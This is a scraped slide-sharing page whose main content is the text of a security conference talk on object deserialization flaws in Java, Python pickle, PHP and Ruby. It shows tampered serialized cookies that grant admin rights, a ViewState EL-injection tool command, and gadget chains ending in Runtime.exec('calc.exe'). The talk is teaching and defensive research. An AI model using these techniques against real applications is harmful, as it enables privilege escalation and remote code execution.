Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsSynopsys Software Integrity Group
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
 
Nodejs性能分析优化和分布式设计探讨
Nodejs性能分析优化和分布式设计探讨Nodejs性能分析优化和分布式设计探讨
Nodejs性能分析优化和分布式设计探讨flyinweb
 
Relational Database Access with Python ‘sans’ ORM
Relational Database Access with Python ‘sans’ ORM  Relational Database Access with Python ‘sans’ ORM
Relational Database Access with Python ‘sans’ ORM Mark Rees
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloudrandomuserid
 
Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysisIbrahim Baliç
 
Building OpenDNS Stats
Building OpenDNS StatsBuilding OpenDNS Stats
Building OpenDNS StatsGeorge Ang
 
Percona Live UK 2014 Part III
Percona Live UK 2014  Part IIIPercona Live UK 2014  Part III
Percona Live UK 2014 Part IIIAlkin Tezuysal
 
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
Ring 0/-2 Rootkits: bypassing defenses  -- DEF CON 2018 USARing 0/-2 Rootkits: bypassing defenses  -- DEF CON 2018 USA
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USAAlexandre Borges
 
Analyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAnalyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAriya Hidayat
 
RING 0/-2 ROOKITS : COMPROMISING DEFENSES
 RING 0/-2 ROOKITS : COMPROMISING DEFENSES RING 0/-2 ROOKITS : COMPROMISING DEFENSES
RING 0/-2 ROOKITS : COMPROMISING DEFENSESPriyanka Aash
 
PLNOG 21: Krzysztof Mazepa - Telemetria_ - _ale_o_co_chodzi...
PLNOG 21: Krzysztof Mazepa - Telemetria_ - _ale_o_co_chodzi...PLNOG 21: Krzysztof Mazepa - Telemetria_ - _ale_o_co_chodzi...
PLNOG 21: Krzysztof Mazepa - Telemetria_ - _ale_o_co_chodzi...PROIDEA
 
Managing your black friday logs - Code Europe
Managing your black friday logs - Code EuropeManaging your black friday logs - Code Europe
Managing your black friday logs - Code EuropeDavid Pilato
 
Managing your Black Friday Logs NDC Oslo
Managing your  Black Friday Logs NDC OsloManaging your  Black Friday Logs NDC Oslo
Managing your Black Friday Logs NDC OsloDavid Pilato
 
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...Faisal Akber
 
Machine Learning and Logging for Monitoring Microservices
Machine Learning and Logging for Monitoring Microservices Machine Learning and Logging for Monitoring Microservices
Machine Learning and Logging for Monitoring Microservices Daniel Berman
 

Similar to Marshalling Pickles: how deserializing objects can ruin your day (20)

Model driven telemetry
Model driven telemetryModel driven telemetry
Model driven telemetry
 
Killing Passwords with JavaScript
Killing Passwords with JavaScriptKilling Passwords with JavaScript
Killing Passwords with JavaScript
 
e10sとアプリ間通信
e10sとアプリ間通信e10sとアプリ間通信
e10sとアプリ間通信
 
Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical Apps
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 
Nodejs性能分析优化和分布式设计探讨
Nodejs性能分析优化和分布式设计探讨Nodejs性能分析优化和分布式设计探讨
Nodejs性能分析优化和分布式设计探讨
 
Relational Database Access with Python ‘sans’ ORM
Relational Database Access with Python ‘sans’ ORM  Relational Database Access with Python ‘sans’ ORM
Relational Database Access with Python ‘sans’ ORM
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloud
 
Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysis
 
Building OpenDNS Stats
Building OpenDNS StatsBuilding OpenDNS Stats
Building OpenDNS Stats
 
Percona Live UK 2014 Part III
Percona Live UK 2014  Part IIIPercona Live UK 2014  Part III
Percona Live UK 2014 Part III
 
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
Ring 0/-2 Rootkits: bypassing defenses  -- DEF CON 2018 USARing 0/-2 Rootkits: bypassing defenses  -- DEF CON 2018 USA
Ring 0/-2 Rootkits: bypassing defenses -- DEF CON 2018 USA
 
Analyzing the Performance of Mobile Web
Analyzing the Performance of Mobile WebAnalyzing the Performance of Mobile Web
Analyzing the Performance of Mobile Web
 
RING 0/-2 ROOKITS : COMPROMISING DEFENSES
 RING 0/-2 ROOKITS : COMPROMISING DEFENSES RING 0/-2 ROOKITS : COMPROMISING DEFENSES
RING 0/-2 ROOKITS : COMPROMISING DEFENSES
 
PLNOG 21: Krzysztof Mazepa - Telemetria_ - _ale_o_co_chodzi...
PLNOG 21: Krzysztof Mazepa - Telemetria_ - _ale_o_co_chodzi...PLNOG 21: Krzysztof Mazepa - Telemetria_ - _ale_o_co_chodzi...
PLNOG 21: Krzysztof Mazepa - Telemetria_ - _ale_o_co_chodzi...
 
Managing your black friday logs - Code Europe
Managing your black friday logs - Code EuropeManaging your black friday logs - Code Europe
Managing your black friday logs - Code Europe
 
Managing your Black Friday Logs NDC Oslo
Managing your  Black Friday Logs NDC OsloManaging your  Black Friday Logs NDC Oslo
Managing your Black Friday Logs NDC Oslo
 
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
 
CryptoWall: How It Works
CryptoWall: How It WorksCryptoWall: How It Works
CryptoWall: How It Works
 
Machine Learning and Logging for Monitoring Microservices
Machine Learning and Logging for Monitoring Microservices Machine Learning and Logging for Monitoring Microservices
Machine Learning and Logging for Monitoring Microservices
 

Recently uploaded

unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 

Marshalling Pickles: how deserializing objects can ruin your day

  • 1. Marshalling Pickles how deserializing objects can ruin your day Gabriel Lawrence (@gebl) and Chris Frohoff (@frohoff)
  • 2. 2 Survey of object serialization vulnerabilities Example exploitation − Sample Apps − Novel Vectors − New Tools Mitigation techniques Talk Goals *Did our best to find previous research and give credit/references. Please let us know if we missed any.
  • 3. 3 snapshots one or more “live”, in-memory objects into a flat, serial stream of data that can be stored or transmitted for reconstitution and use by a different process or the same process at some point Formats − Binary: Java Serialization, Ruby Marshal, Protobuf, Thrift, Avro, MS-NRBF, Android Binder/Parcel, IIOP − Hybrid/Other: PHP Serialization, Python pickle, Binary XML/JSON − Readable: XML, JSON, YAML Platform/Formats may have multiple implementations and/or sub-formats Serializing Objects a.k.a. “marshaling”, “pickling”, “freezing”, ”flattening”
  • 4. 4 Remote/Interprocess Communication (RPC/IPC) − Communicating data to different system/process − Wire protocols, web services, message brokers Caching/Persistence − Communicating data to process’ future self − Databases, cache servers, file systems Tokens − Communicating data to different system/process and back − HTTP cookies, HTML form parameters, API auth tokens Purposes and Mediums Why and where
  • 5. 5 Developers trust it too much and make assumptions − Assume storage/transmission mediums are protected − Assume binary formats are opaque − Assume token authentication can’t be defeated − Assume serialization is “safe“ We abuse trust and defy assumptions for a living But why do we care?
  • 6. 6 “Any big binary blob needs to be investigated as potential object serialization”
  • 8. 8 THESE DEMOS ARE FICTIONAL DRAMATIZATIONS BASED ON TRUE STORIES AND REAL EVENTS. ALL NAMES HAVE BEEN CHANGED TO PROTECT THE GUILTY. * * We have actually seen this stuff in assessments
  • 10. 10 What’s that? Base64 encoded serialized Java object as a cookie value
  • 11. 11 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Serialized Java Object
  • 12. 12 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Class Description
  • 13. 13 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Data in object
  • 14. 14 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0174 0005 ng/String;xp.t.. 0000060: 6368 7269 73 chris Data in object (Manipulated)
  • 15. 15 Screen Shots – Normal Login https://bitbucket.org/gebl/appseccali-cookie
  • 16. 16 Screen Shots – Manipulated to be Admin and Chris https://bitbucket.org/gebl/appseccali-cookie
  • 17. 17 By default, pickle data format uses an ASCII representation − Protocol version 0: ASCII protocol − Protocol version 1: Old binary format − Protocol version 2: New binary format Good write up on the formats: − http://spootnik.org/entries/2014/04/05_diving-into-the-python-pickle-format.html Python Pickle in Cookie
  • 18. 18 What’s that? Base64 encoded pickled Python object
  • 19. 19 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. Pickled Python Object
  • 20. 20 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. Admin Property
  • 21. 21 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. User Property
  • 22. 22 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3031 0a73 5327 7573 6572 270a 7033 .I01.sS'user'.p3 0000020: 0a56 6368 7269 730a 7034 0a73 2e .Vchris.p4.s. Properties (Manipulated)
  • 23. 23 Screen Shots – Normal Login https://bitbucket.org/gebl/appseccali-inapickle
  • 24. 24 Screen Shots – Manipulated to be Admin and Chris https://bitbucket.org/gebl/appseccali-inapickle
  • 26. 26 PHP Serialization Format Basic types: − <type specifier>:<data>; Arrays: − a:<count>:{<key>:<value>,…} Two ways for Objects: − “O” just like array − Custom defined by developer http://www.phpinternalsbook.com/classes_objects/serialization.html
  • 27. 27 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. PHP Serialized Object
  • 28. 28 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Class Name
  • 29. 29 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. IsAdmin Property
  • 30. 30 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Plan Property (Filename)
  • 31. 31 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Username Property
  • 32. 32 Screen Shot - Normal https://bitbucket.org/gebl/appseccali-php
  • 36. 36 Screen Shot – Memcache changed https://bitbucket.org/gebl/appseccali-php
  • 37. 37 Expression Language (EL) allows the use of simple expressions to: − Dynamically read application data − Dynamically write application data − Invoke arbitrary methods Java Server Faces http://www.developer.am/interesting/jsp-application-lifecycle/
  • 38. 38 <h:form> <qcom:userheader dispname="#{loginBean.name}"></qcom:userheader> <ui:fragment rendered="#{loginBean.isadmin}"> <p> you are an admin!</p> </ui:fragment> <h:panelGrid columns="2"> <h:outputText value="Update Login Name"></h:outputText> <h:inputText value="#{loginBean.name}"></h:inputText> </h:panelGrid> <h:commandButton value="Update" action="update"></h:commandButton> </h:form> JSP Source https://bitbucket.org/gebl/appseccali-jsf-el
  • 40. 40 java -jar ViewStateMesser.jar dump Array Items: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 1338668845 Fields: _children: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 159413332 Fields: _children: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 1028214719 Fields: _children: com.qualcomm.isrm.jsf.NullReference@1ddc4ec2 _componentClass: javax.faces.component.html.HtmlOutputLabel _componentId: Dump of ViewState https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
  • 41. 41 org.apache.myfaces.view.facelets.el.ContextAwareTagValueExpressionUEL 935044096 Fields: Custom: org.apache.el.ValueExpressionImpl 396180261 Fields: Custom: 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 00 11 23 7b 6c 6f 67 69 6e 42 65 61 6e 2e 6e 61 6d 65 7d 00 10 6a 61 76 61 2e 6c 61 6e 67 _ _ # { l o g i n B e a n . n a m e } _ _ j a v a . l a n g 2e 4f 62 6a 65 63 74 . O b j e c t NULL NULL Dump of ViewState https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
  • 42. 42 Usage: − java -jar ViewStateMesser.jar "#{loginBean.isadmin}“ Finds all org.apache.el.ValueExpressionImpl and replaces the EL with the supplied argument. Similar to Synacktiv InYourFace tool Changing the ViewState EL https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
  • 43. 43
  • 45. 45 Code reuse attack (a la ROP) Uses “gadget” classes already in scope of application Create chain of instances and method invocations − Start with “kick-off” gadget that executes during or after deserialization − End in “sink” gadget that executes arbitrary code/commands − Use other gadgets to chain start gadget execution to end gadget Serialize chain and send to vulnerable deserialization in application Chain executed in application during/after deserialization Profit Property-Oriented Programming / Object Injection Earliest POP research we found was by Stefan Esser (@i0n1c), “Utilizing Code Reuse/ROP in PHP Application Exploits"
  • 46. 46 Rube-Goldberg-esque Gadget chains are generally carrier-medium, application, and OS/platform agnostic − Relies only on code available to application − Not necessarily code used by application Gadget Classes − Target common libraries/frameworks. Library sprawl FTW. − “Proxy” gadgets versatile − Deserialization hook methods for self-execution Gadget hunting and chain construction is an art − Can be frustrating and tedious − Rich IDEs help, but custom tools are better − https://github.com/frohoff/inspector-gadget (out of scope for talk) Property-Oriented Programming / Object Injection
  • 47. 47 Target Ruby’s ERB templating system Use Rails utility classes in chain Chain from Rails YAML exploit − YAML version required addition gadgets Executed by Rails by accessing session object after deserialization A Ruby + Rails Gadget Chain Chain discovered by Charlie Somerville (@charliesome) as part of a Rails YAML exploit
  • 48. 48 Code Execution via Ruby Marshal Exposed redis listener https://github.com/frohoff/appseccali-rails-redis https://github.com/frohoff/rails_exploits
  • 49. 49
  • 50. 50 A Simple Java Gadget Chain ObjectInputStream.readObject() “calc.exe”
  • 51. 51 Time-Lapse of Deserialization ObjectInputStream.readObject() called ObjectInputStream readObject() defaultReadObject()
  • 52. 52 Time-Lapse of Deserialization CacheManager instance allocated CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
  • 53. 53 Time-Lapse of Deserialization CacheManager.readObject() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
  • 54. 54 Time-Lapse of Deserialization ObjectInputStream.defaultReadObject() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
  • 55. 55 Time-Lapse of Deserialization CommandTask instance allocated and referenced by CacheManager.initHook field CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run()
  • 56. 56 Time-Lapse of Deserialization CommandTask.run() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run()
  • 57. 57 Time-Lapse of Deserialization Runtime.exec() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run() Runtime exec() “calc.exe”
  • 58. 58 Time-Lapse of Deserialization Target program run CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run() Runtime exec() “calc.exe”
  • 60. 60 Target java.lang.Runtime.exec(String cmd) Uses gadgets in JDK and Apache Commons-Collections library Self-executing during deserialization − Executes before object returned to caller A Java + Commons-Collections Gadget Chain Similar POP techniques previously applied to Java Serialization by Wouter Coekaerts (@WouterCoekaerts) and implemented by Alvaro Muñoz (@pwntester)
  • 62. 62 Gadget Chain Construction Code and Call Tree
